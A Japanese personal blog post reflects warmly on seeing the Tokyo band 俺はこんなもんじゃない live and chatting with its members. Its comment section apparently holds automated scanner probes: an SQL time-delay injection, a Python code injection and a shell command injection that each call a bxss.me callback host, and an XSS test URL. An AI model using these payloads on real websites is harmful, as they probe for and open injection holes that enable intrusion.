俺はこんなもんじゃない

俺はこんなもんじゃない。そのバンド名の由来は、、バンドメンバー募集チラシで書かれていた、文言を切り取り名付けられたバンド名だったと思う。そんな、俺はこんなもんじゃないは、15年ぐらいTOKYO中心のライブハウス音楽シーンにおいて、最前線チームに属しながら、表現し続けている、そしてハズレッシヴのメンバーが主催の音楽グループ。2年に一回ぐらいは見に行き、メンバーの狩生やマスダの佇まいや生み出している音楽やグルーブを感じに行っている。今回も感じにいった。いつもと違うのは、きっと自分のほうで、彼らは闇や光をくぐり抜けた、延長線上の姿なのだと思うが、追求している世界観は止まらない列車のごとく、積み重なっているように思えた。そして、仲間として改めて思ったことがあった。それは、二人はとても優しいなと思った。改めて思うことも中々なかったが、そう感じて家に帰って、家人にもそのまんま報告した。仲間から友だちになっているということなのか、自分としては仲間と友だちは違う意味でコトバを使っていたように思うので、ここで書くことでそういう気がしてきた。今となってはどちらでもいいのかもしれないが、二人の様子や迎え入れ方、付き合い方、コトバの色々から感じたことだった。それがなんだかとても嬉しいことで、ここに書き残したくなった。また、メンバーである武田さんとも久々に話をした。ライブハウスの時間は、ヒトが流れている。俺は誰彼と話す時間を自然体に作ることが難しく、それがうまく出来た時は手応えを感じるが、そんな日は少ない。一人と話し込むと他の人と話せない。色々と欲張ると、大した話もできない上に、気ばかり使う。今日は武田さんと話せた。それだけのことだが、俺にとってはやんわりとした嬉しさが残り、またいつか見に行った時の楽しみに繋がるにちがいないと思えた。そして、俺はずっとこう思っている。TOKYOにはいい音楽グループがたーくさんあると!

コメントをお書きください

コメント: 16
  • #1

    kXvrbKwH (金曜日, 08 10月 2021 12:08)

    1

  • #2

    kXvrbKwH (金曜日, 08 10月 2021 12:09)

    1

  • #3

    kXvrbKwH (金曜日, 08 10月 2021 12:10)

    -1; waitfor delay '0:0:15' --

  • #4

    kXvrbKwH (金曜日, 08 10月 2021 12:10)

    1

  • #5

    str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitpbhevogadi3cf7a.'+'bxss.me') (金曜日, 08 10月 2021 12:11)

    1

  • #6

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #7

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #8

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #9

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    $(nslookup hitowchnvjxemfc9c8.bxss.me||perl -e "gethostbyname('hitowchnvjxemfc9c8.bxss.me')")

  • #10

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #11

    HttP://bxss.me/t/xss.html?%00 (金曜日, 08 10月 2021 12:11)

    1

  • #12

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #13

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    add

  • #14

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #15

    kXvrbKwH (金曜日, 08 10月 2021 12:11)

    1

  • #16

    kXvrbKwH (金曜日, 08 10月 2021 13:05)

    1